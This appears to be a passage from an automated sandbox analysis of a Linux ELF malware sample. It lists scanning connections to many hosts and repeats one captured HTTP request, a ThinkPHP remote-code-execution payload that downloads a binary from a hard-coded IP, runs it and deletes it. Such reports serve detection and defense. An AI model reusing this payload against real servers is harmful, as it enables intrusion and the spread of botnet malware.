Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.59.188.65:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.196.3.227:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.26.54.105:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.40.86.203:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.107.158.38:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.235.93.199:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.203.30.206:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.32.76.255:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.127.186.55:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.189.120.246:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.26.205.7:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.92.94.95:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.169.25.23:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.31.30.91:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.170.122.113:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.156.163.208:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.53.210.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.112.232.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.249.114.53:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.124.124.184:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.130.207.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.197.76.108:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.65.101.92:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.183.214.176:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.177.214.232:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.210.140.155:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.91.97.158:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.122.110.82:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.230.7.196:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.13.54.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.252.203.24:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.218.78.191:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.188.143.195:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.72.148.121:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.34.61.254:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.193.54.48:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.221.73.228:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.22.88.87:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.5.57.43:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.246.111.188:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.55.154.39:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.223.152.199:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.239.186.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.84.164.195:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.151.69.128:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.44.19.236:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.164.97.170:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.39.186.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.121.30.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.206.1.243:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.203.126.172:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.8.238.216:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.68.212.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.83.91.74:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.131.222.164:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.64.110.23:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.137.151.34:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.226.115.179:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.212.117.54:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.207.90.30:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.129.78.162:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.15.177.240:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.197.138.10:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.123.237.61:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.174.241.8:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.163.110.42:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.116.29.167:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.174.254.48:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.75.84.213:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.124.81.163:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.27.140.172:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.17.49.96:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.58.0.107:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.191.144.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.29.47.155:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.203.210.63:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.58.68.104:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.248.86.223:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.27.117.130:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.243.125.240:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.224.245.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.128.0.57:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.45.218.143:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.48.71.17:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.255.72.42:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.198.168.95:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.161.20.64:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.223.149.171:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.221.8.183:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.190.201.12:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.36.140.30:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.93.169.119:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.34.231.186:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.160.35.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.77.243.193:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.185.215.135:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.211.118.169:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.95.155.130:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.89.172.63:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.47.226.95:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.223.240.191:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.63.187.51:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.3.108.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.91.115.199:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.45.27.41:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.255.188.120:8080

Source: /tmp/E6l0C6FObI.elf (PID: 5827)

Socket: 127.0.0.1::23455

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 197.255.59.61
Source: unknown	TCP traffic detected without corresponding DNS query: 197.155.118.60
Source: unknown	TCP traffic detected without corresponding DNS query: 197.140.93.193
Source: unknown	TCP traffic detected without corresponding DNS query: 197.94.36.228
Source: unknown	TCP traffic detected without corresponding DNS query: 197.240.169.137
Source: unknown	TCP traffic detected without corresponding DNS query: 197.156.75.239
Source: unknown	TCP traffic detected without corresponding DNS query: 197.232.233.5
Source: unknown	TCP traffic detected without corresponding DNS query: 197.244.118.41
Source: unknown	TCP traffic detected without corresponding DNS query: 197.27.205.153
Source: unknown	TCP traffic detected without corresponding DNS query: 197.23.216.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.117.216.223
Source: unknown	TCP traffic detected without corresponding DNS query: 197.9.175.108
Source: unknown	TCP traffic detected without corresponding DNS query: 197.190.121.11
Source: unknown	TCP traffic detected without corresponding DNS query: 197.123.46.241
Source: unknown	TCP traffic detected without corresponding DNS query: 197.146.53.46
Source: unknown	TCP traffic detected without corresponding DNS query: 197.245.73.238
Source: unknown	TCP traffic detected without corresponding DNS query: 197.54.220.233
Source: unknown	TCP traffic detected without corresponding DNS query: 197.224.124.198
Source: unknown	TCP traffic detected without corresponding DNS query: 197.247.131.106
Source: unknown	TCP traffic detected without corresponding DNS query: 197.51.193.179
Source: unknown	TCP traffic detected without corresponding DNS query: 197.185.2.78
Source: unknown	TCP traffic detected without corresponding DNS query: 197.39.182.12
Source: unknown	TCP traffic detected without corresponding DNS query: 197.86.193.36
Source: unknown	TCP traffic detected without corresponding DNS query: 197.100.199.92
Source: unknown	TCP traffic detected without corresponding DNS query: 197.242.100.146
Source: unknown	TCP traffic detected without corresponding DNS query: 197.240.50.107
Source: unknown	TCP traffic detected without corresponding DNS query: 197.253.178.177
Source: unknown	TCP traffic detected without corresponding DNS query: 197.163.48.77
Source: unknown	TCP traffic detected without corresponding DNS query: 197.200.161.248
Source: unknown	TCP traffic detected without corresponding DNS query: 197.30.150.205
Source: unknown	TCP traffic detected without corresponding DNS query: 197.145.155.228
Source: unknown	TCP traffic detected without corresponding DNS query: 197.181.142.56
Source: unknown	TCP traffic detected without corresponding DNS query: 197.66.175.231
Source: unknown	TCP traffic detected without corresponding DNS query: 197.40.202.138
Source: unknown	TCP traffic detected without corresponding DNS query: 197.254.121.67
Source: unknown	TCP traffic detected without corresponding DNS query: 197.7.115.249
Source: unknown	TCP traffic detected without corresponding DNS query: 197.17.45.55
Source: unknown	TCP traffic detected without corresponding DNS query: 197.158.67.122
Source: unknown	TCP traffic detected without corresponding DNS query: 197.26.165.255
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.77.144
Source: unknown	TCP traffic detected without corresponding DNS query: 197.245.119.108
Source: unknown	TCP traffic detected without corresponding DNS query: 197.19.29.153
Source: unknown	TCP traffic detected without corresponding DNS query: 197.120.199.234
Source: unknown	TCP traffic detected without corresponding DNS query: 197.176.240.216
Source: unknown	TCP traffic detected without corresponding DNS query: 197.169.171.219
Source: unknown	TCP traffic detected without corresponding DNS query: 197.125.83.44
Source: unknown	TCP traffic detected without corresponding DNS query: 197.69.237.149
Source: unknown	TCP traffic detected without corresponding DNS query: 197.144.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 197.88.59.149
Source: unknown	TCP traffic detected without corresponding DNS query: 197.187.160.223

Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
